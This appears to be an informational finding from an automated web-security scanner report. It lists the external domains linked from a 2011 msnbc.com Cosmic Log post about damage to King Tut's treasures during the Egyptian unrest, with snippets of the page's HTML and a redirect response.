</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://jimseida.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.60. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The page was loaded from a URL containing a query string:

http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001

The response contains the following links to other domains:

http://17762999337.newsvine.com/
http://2wylde4u.newsvine.com/
http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajpage.newsvine.com/
http://alan1380274.newsvine.com/
http://alfromnorcal.newsvine.com/
http://ally2998591.newsvine.com/
http://andiesandiegoca.newsvine.com/
http://angie1939907.newsvine.com/
http://benjamin35.newsvine.com/
http://blacklabsdad.newsvine.com/
http://blackshoesblacksocks.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://bob-randall-1218482.newsvine.com/
http://boyle.newsvine.com/
http://bspurloc.newsvine.com/
http://cc-f.newsvine.com/
http://cindy2999049.newsvine.com/
http://concerned2999376.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://crappygovernment.newsvine.com/
http://cristofocristofo.newsvine.com/
http://crstardust.newsvine.com/
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://daveknightstable.newsvine.com/
http://davethedoubter.newsvine.com/
http://declan01.newsvine.com/
http://demmcc.newsvine.com/
http://doubleg2996677.newsvine.com/
http://drewcabrera.newsvine.com/
http://earthsky.org/
http://eastrowandad.newsvine.com/
http://elisa2999017.newsvine.com/
http://eurekalert.org/
http://eviljason.newsvine.com/
http://freedman1-1.newsvine.com/
http://freemannogod.newsvine.com/
http://genericname.newsvine.com/
http://geoduck2999500.newsvine.com/
http://googoonanny.newsvine.com/
http://greg-51.newsvine.com/
http://gregb2.newsvine.com/
http://hardball.msnbc.com/
http://hehummel.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://henrybadgood.newsvine.com/
http://hernan-ferrea.newsvine.com/
http://http/www.universetoday.com/
http://jimseida.newsvine.com/
http://john-roach.newsvine.com/
http://johntitor1.newsvine.com/
http://jtjsrch.newsvine.com/
http://justiceforall2038290.newsvine.com/
http://kathy-1571680.newsvine.com/
http://kevpatok.newsvine.com/
http://krasnaludec.newsvine.com/
http://lamortdelioncourt.newsvine.com/
http://lbjack.newsvine.com/
http://lbowman1.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5943271&rand=1422531462&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::
http://lola3.newsvine.com/
http://lynngrant.newsvine.com/
http://mahmoodabidizajahd.newsvine.com/
http://mar2892158.newsvine.com/
http://marysusan.newsvine.com/
http://melissa2673591.newsvine.com/
http://mintyfreshness.newsvine.com/
http://mkilsley.newsvine.com/
http://morphine-carnival.newsvine.com/
http://morriswise2276198.newsvine.com/
http://msn.whitepages.com/
http://mtg303.newsvine.com/
http://mtp.msnbc.com/
http://n2nh2000.newsvine.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://optomyst-1.newsvine.com/
http://piotrpanne.newsvine.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://ra-rishikavi-raghudas.newsvine.com/
http://rachel.msnbc.com/
http://ray2105828.newsvine.com/
http://rebecca2999066.newsvine.com/
http://redtape.msnbc.com/
http://rjohnson1998028.newsvine.com/
http://sanescience.newsvine.com/
http://science.slashdot.org/
http://scott2632503.newsvine.com/
http://seedmagazine.com/
http://selmor101.newsvine.com/
http://smarterthanyou2999028.newsvine.com/
http://snapsean.newsvine.com/
http://spacefellowship.com/
http://stspecialk.newsvine.com/
http://threeboysmom.newsvine.com/
http://toastymcgrath.newsvine.com/
http://today.msnbc.com/
http://trobertz.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://wtfever.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.dailymail.co.uk/news/article-1351826/Egypt-protests-Looters-bid-steal-King-Tuts-treasures.html
http://www.delish.com/
http://www.eloquentpeasant.com/2011/01/29/statues-of-tutankhamun-damagedstolen-from-the-egyptian-museum/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged
http://www.geekpress.com/
http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_expandcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/images/users/600/boyle/5950504.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.unmannedspaceflight.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged?GT1=43001
Content-Type: text/html
Cache-Control: max-age=284
Date: Sun, 30 Jan 2011 16:43:35 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Were Tut's t
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5943271&rand=1422531462&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a>, or connect via <a href="http://www.facebook.com/cosmiclog" target="_blank">Facebook</a> or <a href="http://twitter.com/b0yle" target="_blank">Twitter</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>Margaret Maitland, an Egyptologist at Oxford University in England, <a target="_blank" href="http://www.eloquentpeasant.com/2011/01/29/statues-of-tutankhamun-damagedstolen-from-the-egyptian-museum/">matched up shots of the damage</a>
...[SNIP]...
<div id="vine-inlinePhoto__5950504" data-contentId="5950504" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="boyle/5950504.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/boyle/5950504.jpg" width="600" height="386" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The footage suggests that a third statuette of a standing Tut was broken off right at the feet. Check out Maitland's <a target="_blank" href="http://www.eloquentpeasant.com/2011/01/29/statues-of-tutankhamun-damagedstolen-from-the-egyptian-museum/">blog posting at the Eloquent Peasant</a>
...[SNIP]...
s headquarters, virtually next door, and at last report that building was still in danger of collapse. "What scares me is that if this building is destroyed, it will fall over the museum," Hawass <a target="_blank" href="http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584">told reporters</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
urgent call on the Al Arabiya television channel: "I am calling on the Egyptian army to head instantly to the Egyptian Museum. There is a fire right next to it in the party headquarters," he said in a <a target="_blank" href="http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128">report relayed by Reuters</a>
...[SNIP]...
<p itxtvisited="1">"I felt deeply sorry today when I came this morning to the Egyptian Museum and found that some had tried to raid the museum by force last night," <a href="http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129">Reuters quoted him as saying</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</strong> <a target="_blank" href="http://www.dailymail.co.uk/news/article-1351826/Egypt-protests-Looters-bid-steal-King-Tuts-treasures.html">The Daily Mail </a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a> community by clicking the "like" button on <a target="_blank" href="http://www.facebook.com/cosmiclog">our Facebook page</a> or by following msnbc.com science editor Alan Boyle as <a href="http://twitter.com/b0yle">b0yle on Twitter</a>. To learn more about Alan Boyle's book about Pluto and the search for planets, check out the <a target="_blank" href="http://www.thecaseforpluto.com/">website for "The Case for Pluto."</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="cosmiclog" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged" data-Text="Were Tut's treasures damaged?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://bspurloc.newsvine.com/">bspurloc</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://crappygovernment.newsvine.com/">Ben-1671313</a>
...[SNIP]...
<div class="normal"><a href="http://cristofocristofo.newsvine.com/">Teacher Trish</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Kathy-1571680.newsvine.com/">Kathy-1571680</a>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="normal"><a href="http://freedman1-1.newsvine.com/">freedman1</a>
...[SNIP]...
<div class="normal"><a href="http://kevpatok.newsvine.com/">kpokeefe</a>
...[SNIP]...
<div class="normal"><a href="http://Elisa2999017.newsvine.com/">Elisa-2999017</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://LBowman1.newsvine.com/">LBowman1</a>
...[SNIP]...
<div class="normal"><a href="http://drewcabrera.newsvine.com/">DrewMeister</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://HEHummel.newsvine.com/">H.E. Hummel</a>
...[SNIP]...
<div class="normal"><a href="http://EastRowanDad.newsvine.com/">EastRowanDad</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Rebecca2999066.newsvine.com/">Rebecca-2999066</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mkilsley.newsvine.com/">SecondSight</a>
...[SNIP]...
<div class="normal"><a href="http://AlfromNorCal.newsvine.com/">Al from NorCal</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://BlackLabsDad.newsvine.com/">BlackLabsDad</a>
...[SNIP]...
<div class="normal"><a href="http://Scott2632503.newsvine.com/">Scott-2632503</a>
...[SNIP]...
<div class="normal"><a href="http://hernan-ferrea.newsvine.com/">Martin33189</a>
...[SNIP]...
<div class="normal"><a href="http://geoduck2999500.newsvine.com/">geoduck-2999500</a>
...[SNIP]...
<div class="normal"><a href="http://bob-randall-1218482.newsvine.com/">Bob Randall-1218482</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="normal"><a href="http://snapsean.newsvine.com/">snapsean</a>
...[SNIP]...
<div class="normal"><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
